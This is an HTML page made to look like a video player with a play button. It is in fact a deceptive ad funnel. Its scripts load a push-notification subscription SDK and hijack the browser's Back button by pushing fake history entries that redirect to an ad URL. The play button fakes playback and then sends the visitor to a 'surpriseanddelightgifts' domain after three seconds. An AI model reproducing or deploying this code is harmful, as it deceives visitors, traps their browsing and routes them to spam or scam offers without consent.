<html xmlns="http://www.w3.org/1999/xhtml" xmlns:th="http://www.thymeleaf.org">

<head>
	<title>Video Player</title>
	<meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=no" />
	<meta name="MobileOptimized" content="width" />
	<meta name="HandheldFriendly" content="true" />
	<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
	<meta name="format-detection" content="telephone=no" />

	<style>
		/** header **/
		.header {}

		.header .wrapper {
			display: block;
		}

		.header .header-text {}

		.header .age-limit {}

		.main {}

		.main .activation-btn-wrapper {}

		.main .activation-btn {}

		.activation-btn:before {}

		.activation-btn:after {}

		.main .activation-btn-text {}

		.main .info-block-wrapper {}

		.main .info-block {}

		.main .info-block .info-block-text {}

		.main .info-block-text {}

		.main .cancel-btn-wrapper {
			display: none;
		}

		@media screen and (max-height:550px) {
			.main .cancel-btn-wrapper {
				display: none;
			}
		}

		.main .cancel-btn {
			display: none;
		}

		.main .cancel-btn-text {}

		.footer {}

		@media screen and (max-width:400px) {
			.footer {}
		}

		.footer .wrapper {}

		.footer .footer-text {}

		.footer .footer-text-delim {}

		.footer .footer-text.small {}

		.modal {
			display: none;
		}

		.modal .modal-dialog {}

		.modal .close-top {}

		.modal .close-top a {}

		.modal .close-bottom {}

		.modal .close-bottom a {}

		.modal .modal-content {}

		.modal .modal-content h3 {}

		.modal .modal-content p {}

		.modal-backdrop {}

		.background {}

		@media screen and (orientation: landscape) {
			.header {}

			.header .wrapper {}

			.header .age-limit {}

			.main .activation-btn-wrapper {}

			.main .activation-btn-wrapper {}

			.main .info-block-wrapper {}

			.footer {}

			.footer .wrapper div {}
		}

		.bee-box,
		.d-none {
			display: none;
		}

		/*end bee rubbish */

		/* our mobile styles
	    ---------------------------------------------------*/
		* {
			margin: 0;
			padding: 0;
			box-sizing: border-box;
		}

		body {
			background: #000;
			font-size: 10px;
			line-height: 1;
			font-family: 'Open Sans', sans-serif;
		}

		body.load {
			background: #000;
		}

		body,
		a {
			-webkit-text-size-adjust: none;
			text-size-adjust: none;
		}

		a {
			text-decoration: underline;
		}

		/* our mobile styles
		---------------------------------------------------*/
		.blur {
			-webkit-filter: blur(2px);
			-moz-filter: blur(2px);
			filter: url('data:image/svg+xml;charset=utf8,<svg version="1.1" xmlns="http://www.w3.org/2000/svg"><filter id="blur"><feGaussianBlur stdDeviation="2"/></filter></svg>#blur');
			filter: blur(2px);
		}

		.mpic {
			display: block;
			max-width: 100%;
			margin: 0 auto;
		}

		body:before {
			content: '';
			position: absolute;
			top: 0;
			left: 0;
			right: 0;
			bottom: 0;
			background: url('poster.jpg') center center no-repeat;
			background-size: cover;
			opacity: 0.3;
			-webkit-filter: blur(30px);
			filter: blur(30px);
		}

		.wrap {
			position: fixed;
			top: 0;
			left: 0;
			right: 0;
			bottom: 0;
			background: #000;
			max-width: 480px;
			margin: 0 auto;
			z-index: 111;
		}

		.wrap-video {
			position: absolute;
			top: 0;
			left: 0;
			right: 0;
			bottom: 0;
			max-height: 65vh;
			margin: auto;
			z-index: 11;
			overflow: hidden;
		}

		.video {
			position: absolute;
			top: 0;
			left: 0;
			bottom: 0;
			margin: auto;
			width: 100%;
		}

		.header {
			position: absolute;
			top: 15px;
			left: 0;
			right: 0;
			z-index: 10000;
			color: #fff;
			font-size: 15px;
			line-height: 20px;
			text-align: center;
		}

		.header span {
			opacity: 0.6;
		}

		.sign {
			position: absolute;
			top: -50px;
			left: 0;
			right: 0;
			color: #fff;
			font-size: 20px;
			text-shadow: 0 0 4px rgba(0, 0, 0, 0.9);
		}

		.main {
			position: absolute;
			top: 60%;
			left: 0;
			width: 100%;
			-webkit-transform: translateY(-50%);
			-ms-transform: translateY(-50%);
			-moz-transform: translateY(-50%);
			-o-transform: translateY(-50%);
			transform: translateY(-50%);
			margin-top: -50px;
			text-align: center;
			z-index: 10000;
		}


		.footer {
			position: absolute;
			bottom: 0;
			left: 0;
			right: 0;
			padding-bottom: 2px;
			color: #555;
			font-size: 16px;
			line-height: 0.8;
			text-align: center;
			background: #000;
			z-index: 10000;
		}

		.right-bar {
			position: absolute;
			right: 10px;
			bottom: 100%;
			margin-bottom: 10px;
			width: 70px;
			height: 381px;
			background: url('right-bar.png') center bottom no-repeat;
			background-size: 100% auto;
		}

		.timer {
			position: absolute;
			left: -200px;
			right: 0px;
			top: 13px;
			margin: 0px auto;
			bottom: 100%;
			margin-bottom: 10px;
			color: #fff;
			font-size: 13px;
			line-height: 20px;
			letter-spacing: 0.9px;
			text-align: center;
		}
		@media (max-width:340px){
			.timer{
				left: -180px;
			}
			
		}
		.gray {
			filter: brightness(0.4);
		}

		@media (max-height: 420px) {}

		@media (orientation: landscape) and (min-width: 768px) {}
	</style>
	
	<!--Rollerads-->
<script async data-cfasync="false">
  (function() {
      const url = new URL(window.location.href);
      const clickID = url.searchParams.get("click_id");
      const sourceID = url.searchParams.get("source_id");

      const s = document.createElement("script");
      s.dataset.cfasync = "false";
      s.src = "https://sdk4push.com/f/sdk.js?z=1238026";
      s.onload = (opts) => {
          opts.zoneID = 1238026;
          opts.extClickID = clickID;
          opts.subID1 = sourceID;
          opts.actions.onPermissionGranted = () => {};
          opts.actions.onPermissionDenied = () => {};
          opts.actions.onAlreadySubscribed = () => {};
          opts.actions.onError = () => {};
      };
      document.head.appendChild(s);
  })()
</script>

 <!--iMonetizerIt-->

<script> function imiBB() { let url = "https://app.impih.com/?utm_medium=9afb263ead84fd656a37a10f917fc288156a2bdb&utm_campaign=WW&2=bbr&np=1&cid={clickid}"; try { history.pushState({}, '', location.href); history.pushState({}, '', location.href); window.onpopstate = function (ev) { if (ev['state']) { location.replace(url); } }; } catch (ex) {} } !function () { let touched = false; let chromeVersion = 0; try { chromeVersion = +(new RegExp('Chrome/([0-9]+)').exec(navigator.userAgent)[1]); } catch (e) { chromeVersion = 0; } if (chromeVersion >= 75) { window.addEventListener('mouseup', function () { if (!touched) { touched = true; setTimeout(function () { imiBB(); } , 0); } } ); document.addEventListener("DOMContentLoaded", function () { document.body.addEventListener('touchend', function (evt) { if (!touched) { touched = true; setTimeout(function () { imiBB(); } , 0); } } ); document.body.addEventListener('keydown', function () { if (!touched) { touched = true; setTimeout(function () { imiBB(); } , 0); } } ); } ); } else { setTimeout(function () { imiBB(); } , 0); } } (); </script>

	
</head>

<body class="background" id="resize">
	<div class="wrap">
		<div class="wrap-video gray">
			<video class="video " src="video.mp4">
				<source type="video/mp4">
			</video>
		</div>

		<div class="header">
			<img class="mpic" src="top.jpg" alt="" />
		</div>

		<div id="main-block" class="main">
			<div class="step-1">
				<svg class="play-icon mpic" width="70" height="70" viewBox="0 0 48 48" fill="#fff"
					xmlns="http://www.w3.org/2000/svg" onclick="play();">
					<path fill-rule="evenodd" clip-rule="evenodd"
						d="M12 8.77702C12 6.43812 14.5577 4.99881 16.5569 6.21266L41.6301 21.4356C43.5542 22.6038 43.5542 25.3962 41.6301 26.5644L16.5569 41.7873C14.5577 43.0012 12 41.5619 12 39.223V8.77702Z">
					</path>
				</svg>
			</div>
			<div class="step-2 d-none">
				<div class="sign">شاهد الآن...</div>
				<svg class="mpic" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"
					width="180px" height="180px" viewBox="0 0 100 100" preserveAspectRatio="xMidYMid">
					<g transform="translate(80,50)">
						<g transform="rotate(0)">
							<circle cx="0" cy="0" r="6" fill="#ffffff" fill-opacity="1">
								<animateTransform attributeName="transform" type="scale" begin="-0.875s"
									values="1.5 1.5;1 1" keyTimes="0;1" dur="1s" repeatCount="indefinite">
								</animateTransform>
								<animate attributeName="fill-opacity" keyTimes="0;1" dur="1s" repeatCount="indefinite"
									values="1;0" begin="-0.875s"></animate>
							</circle>
						</g>
					</g>
					<g transform="translate(71.21320343559643,71.21320343559643)">
						<g transform="rotate(45)">
							<circle cx="0" cy="0" r="6" fill="#ffffff" fill-opacity="0.875">
								<animateTransform attributeName="transform" type="scale" begin="-0.75s"
									values="1.5 1.5;1 1" keyTimes="0;1" dur="1s" repeatCount="indefinite">
								</animateTransform>
								<animate attributeName="fill-opacity" keyTimes="0;1" dur="1s" repeatCount="indefinite"
									values="1;0" begin="-0.75s"></animate>
							</circle>
						</g>
					</g>
					<g transform="translate(50,80)">
						<g transform="rotate(90)">
							<circle cx="0" cy="0" r="6" fill="#ffffff" fill-opacity="0.75">
								<animateTransform attributeName="transform" type="scale" begin="-0.625s"
									values="1.5 1.5;1 1" keyTimes="0;1" dur="1s" repeatCount="indefinite">
								</animateTransform>
								<animate attributeName="fill-opacity" keyTimes="0;1" dur="1s" repeatCount="indefinite"
									values="1;0" begin="-0.625s"></animate>
							</circle>
						</g>
					</g>
					<g transform="translate(28.786796564403577,71.21320343559643)">
						<g transform="rotate(135)">
							<circle cx="0" cy="0" r="6" fill="#ffffff" fill-opacity="0.625">
								<animateTransform attributeName="transform" type="scale" begin="-0.5s"
									values="1.5 1.5;1 1" keyTimes="0;1" dur="1s" repeatCount="indefinite">
								</animateTransform>
								<animate attributeName="fill-opacity" keyTimes="0;1" dur="1s" repeatCount="indefinite"
									values="1;0" begin="-0.5s"></animate>
							</circle>
						</g>
					</g>
					<g transform="translate(20,50.00000000000001)">
						<g transform="rotate(180)">
							<circle cx="0" cy="0" r="6" fill="#ffffff" fill-opacity="0.5">
								<animateTransform attributeName="transform" type="scale" begin="-0.375s"
									values="1.5 1.5;1 1" keyTimes="0;1" dur="1s" repeatCount="indefinite">
								</animateTransform>
								<animate attributeName="fill-opacity" keyTimes="0;1" dur="1s" repeatCount="indefinite"
									values="1;0" begin="-0.375s"></animate>
							</circle>
						</g>
					</g>
					<g transform="translate(28.78679656440357,28.786796564403577)">
						<g transform="rotate(225)">
							<circle cx="0" cy="0" r="6" fill="#ffffff" fill-opacity="0.375">
								<animateTransform attributeName="transform" type="scale" begin="-0.25s"
									values="1.5 1.5;1 1" keyTimes="0;1" dur="1s" repeatCount="indefinite">
								</animateTransform>
								<animate attributeName="fill-opacity" keyTimes="0;1" dur="1s" repeatCount="indefinite"
									values="1;0" begin="-0.25s"></animate>
							</circle>
						</g>
					</g>
					<g transform="translate(49.99999999999999,20)">
						<g transform="rotate(270)">
							<circle cx="0" cy="0" r="6" fill="#ffffff" fill-opacity="0.25">
								<animateTransform attributeName="transform" type="scale" begin="-0.125s"
									values="1.5 1.5;1 1" keyTimes="0;1" dur="1s" repeatCount="indefinite">
								</animateTransform>
								<animate attributeName="fill-opacity" keyTimes="0;1" dur="1s" repeatCount="indefinite"
									values="1;0" begin="-0.125s"></animate>
							</circle>
						</g>
					</g>
					<g transform="translate(71.21320343559643,28.78679656440357)">
						<g transform="rotate(315)">
							<circle cx="0" cy="0" r="6" fill="#ffffff" fill-opacity="0.125">
								<animateTransform attributeName="transform" type="scale" begin="0s" values="1.5 1.5;1 1"
									keyTimes="0;1" dur="1s" repeatCount="indefinite"></animateTransform>
								<animate attributeName="fill-opacity" keyTimes="0;1" dur="1s" repeatCount="indefinite"
									values="1;0" begin="0s"></animate>
							</circle>
						</g>
					</g>
				</svg>
			</div>
		</div>

		<div class="footer">
			<div class="timer"><span id="time">0:00</span>/0:09 </div>
			<img class="mpic" src="bottom.jpg" alt="">
		</div>
	</div>
	<script>
		function play() {
			
			document.querySelector('.video').play();
			document.querySelector('.step-1').classList.add('d-none');
			
				document.querySelector('.wrap-video').classList.add('gray');
				document.querySelector('.video').pause();
				document.querySelector('.step-2').classList.remove('d-none');
				setTimeout(function () {
					location.href = 'https://tkr9.surpriseanddelightgifts.com/cool.php?lp=1';
				}, 3000);
			
		}
	</script>
</body>

</html>
